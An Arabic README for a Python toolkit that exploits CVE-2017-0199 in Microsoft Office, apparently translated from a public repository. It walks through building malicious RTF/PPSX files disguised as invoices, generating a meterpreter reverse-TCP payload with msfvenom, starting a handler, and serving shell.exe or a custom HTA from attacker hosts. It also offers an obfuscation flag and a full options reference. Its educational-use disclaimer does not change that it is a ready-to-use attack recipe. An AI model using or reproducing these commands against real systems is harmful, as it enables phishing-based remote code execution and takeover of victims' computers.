
نص برمجي بلغة بايثون لإنشاء ملفات RTF/PPSX خبيثة تستغل الثغرة CVE-2017-0199 لتنفيذ أكواد عن بعد، وتوصيل حمولات Metasploit أو حمولات مخصصة بأقل قدر من التهيئة.
مجموعة أدوات الاستغلال CVE-2017-0199 - الإصدار 4.0 هي سكريبت بايثون عملي يوفر لمختبرِي الاختراق والباحثين في مجال الأمن طريقة سريعة وفعالة لاختبار تنفيذ الأوامر عن بُعد (RCE) في Microsoft Office. يمكن لهذه الأداة إنشاء ملف RTF/PPSX خبيث وتوصيل حمولة metasploit / meterpreter / أي حمولة أخرى للضحية دون أي إعدادات معقدة.
هذا البرنامج مخصص للأغراض التعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة أنني (bhdresh) لست مسؤولاً عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو إساءة استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذا البرنامج، فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.
أخيرًا، هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه لأغراض سيئة!
رخصة CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
تم إدخال الإمكانيات التالية إلى السكريبت
- إنشاء ملف PPSX خبيث
- وضع الاستغلال للملف PPSX الذي تم إنشاؤه
- تحديث ملف template.ppsx
الإصدار: بايثون إصدار 2.7.13
1) إنشاء ملف RTF خبيث
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (اختياري، إذا كنت تستخدم حمولة MSF): إنشاء حمولة metasploit وبدء المعالج
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) بدء مجموعة الأدوات في وضع الاستغلال لتوصيل حمولة محلية
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

1) إنشاء ملف RTF خبيث
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) بدء مجموعة الأدوات في وضع الاستغلال لتوصيل حمولة عن بُعد
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe

1) إنشاء ملف RTF خبيث
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) بدء مجموعة الأدوات في وضع الاستغلال لتوصيل ملف HTA مخصص
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta

# python cve-2017-0199_toolkit.py -h
هذه مجموعة أدوات مفيدة لاستغلال CVE-2017-0199 (تنفيذ الأوامر عن بُعد في Microsoft Office)
الأوضاع:
-M gen إنشاء ملف خبيث فقط
إنشاء ملف RTF/PPSX خبيث:
-w <Filename.rtf/Filename.ppsx> اسم ملف RTF/PPSX الخبيث (شارك هذا الملف مع الضحية).
-u <http://attacker.com/test.hta> المسار إلى ملف HTA/SCT. عادةً، يجب أن يكون هذا نطاقًا أو عنوان IP حيث تعمل هذه الأداة.
على سبيل المثال، http://attackerip.com/test.doc (سيتم تضمين عنوان URL هذا في ملف RTF/PPSX الخبيث وسيتم طلبه بمجرد أن يفتح الضحية ملف RTF الخبيث).
-t RTF|PPSX (افتراضي = RTF) نوع الملف المراد إنشاؤه.
-x 0|1 (افتراضي = 0) إنشاء ملف RTF مشوش. 0 = تعطيل، 1 = تفعيل.
-M exp بدء وضع الاستغلال
الاستغلال:
-t RTF|PPSX (افتراضي = RTF) نوع الملف المراد استغلاله.
-H </tmp/custom> المسار المحلي لملف HTA/SCT مخصص والذي يجب توصيله وتنفيذه على الجهاز الهدف.
ملاحظة: هذا الخيار لن يقوم بتوصيل الحمولات المحددة عبر الخيارين "-e" و "-l"
-p <TCP port:Default 80> رقم المنفذ المحلي.
-e <http://attacker.com/shell.exe> المسار إلى ملف تنفيذي / شيل meterpreter / حمولة يجب تنفيذها على الجهاز الهدف.
-l </tmp/shell.exe> إذا كانت الحمولة مستضافة محليًا، حدد المسار المحلي للملف التنفيذي / شيل meterpreter / الحمولة.
@nixawk لعينة RTF، @Li Haifei، @bhdresh
من الواضح أنني لست مطورًا بدوام كامل، لذا توقع بعض المشكلات
يرجى الإبلاغ عن الأخطاء والمشكلات عبر https://github.com/bhdresh/CVE-2017-0199/issues/new